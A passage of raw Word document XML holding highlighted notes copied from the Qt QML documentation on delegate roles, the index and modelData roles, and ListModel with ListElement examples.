        <w:t>import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QtQuick</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2.0</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Item</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200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height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250</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ListModel</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myModel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type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"Dog"</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age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8</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type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"Cat"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age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5</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Component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myDelegate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type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 "</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age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ListView</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fill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model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myModel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delegate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myDelegate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824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If there is a naming clash between the model's properties and the delegate's properties, the roles can be accessed with the qualified</w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>model</w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name instead</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, if a</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2571" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type had</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties, the text in the above example would display those property values instead of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>values from the model item. In this case, the properties could have been referenced as</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>model.type</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>model.age</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instead to ensure the delegate displays the property values from the model item.</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 xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>special</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA" w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidR="00824FFA" w:rsidRPr="00824FFA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>role</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing the index of the item in the model is also </w:t>
      </w:r>
      <w:r w:rsidRPr="00824FFA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>available to the delegate</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00020326">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note this index is set to -1 if the item is removed from the model</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. If you bind to the index role, be sure that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00020326">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logic accounts for the possibility of index being -1</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00020326">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i.e. that the item is no longer valid</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. (Usually the item will shortly be destroyed, but it is possible to delay delegate destruction in some views via a</w:t>
      </w:r>
      <w:r w:rsidR="00020326">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00020326">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delayRemove</w:t>
      </w:r>
      <w:r w:rsidR="00020326" w:rsidRPr="00020326">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00020326">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached property</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.)</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Models that do not have named roles (such as the</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2572" w:anchor="listmodel" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shown below) will have the data provided via the</w:t>
      </w:r>
      <w:r w:rsidR="000B1D83">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003903DE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modelData</w:t>
      </w:r>
      <w:r w:rsidR="000B1D83" w:rsidRPr="003903DE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003903DE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>role</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The</w:t>
      </w:r>
      <w:r w:rsidR="000B1D83">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modelData</w:t>
      </w:r>
      <w:r w:rsidR="000B1D83">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">role is also provided for models that </w:t>
      </w:r>
      <w:r w:rsidRPr="000B1D83">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>have only one role</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In this case the</w:t>
      </w:r>
      <w:r w:rsidR="000B1D83">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modelData</w:t>
      </w:r>
      <w:r w:rsidR="000B1D83">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>role contains the same data as the named role.</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8D4C56">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML provides several types of data models among the built-in set of QML types</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> In addition, models can be created with Qt </w:t>
      </w:r>
      <w:r w:rsidRPr="000B1D83">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C++</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then made available to</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2573" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlEngine</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for use by QML components. For information about creating these models, visit the</w:t>
      </w:r>
      <w:r w:rsidR="000B1D83">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2574" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using C++ Models with Qt Quick Views</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B1D83">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="000B1D83">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2575" w:anchor="qml-object-types" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>creating QML types</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B1D83">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>articles.</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262C32">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Positioning of items from a model can be achieved using a</w:t>
      </w:r>
      <w:r w:rsidR="00262C32" w:rsidRPr="00262C32">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2576" w:history="1">
        <w:r w:rsidRPr="00262C32">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Repeater</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="003903DE">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2294" w:name="listmodel"/>
      <w:bookmarkStart w:id="2295" w:name="_Toc483001025"/>
      <w:bookmarkStart w:id="2296" w:name="_Toc483004016"/>
      <w:bookmarkStart w:id="2297" w:name="_Toc483604366"/>
      <w:bookmarkStart w:id="2298" w:name="_Toc483605586"/>
      <w:bookmarkEnd w:id="2294"/>
      <w:r w:rsidRPr="003903DE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListModel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2295"/>
      <w:bookmarkEnd w:id="2296"/>
      <w:bookmarkEnd w:id="2297"/>
      <w:bookmarkEnd w:id="2298"/>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="001B3733" w:rsidRDefault="00490E7E" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2577" w:anchor="listmodel" w:history="1">
        <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001B3733">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is a </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="001B3733">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simple hierarchy of types</w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> specified in QML. The available roles are specified by the</w:t>
      </w:r>
      <w:r w:rsidR="001B3733">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2578" w:history="1">
        <w:r w:rsidR="00630F70" w:rsidRPr="001B3733">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListElement</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001B3733">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties.</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ListModel</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fruitModel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"Apple"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cost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2.45</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"Orange"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cost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3.25</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ListElement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"Banana"</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cost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1.95</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The above model has two roles,</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
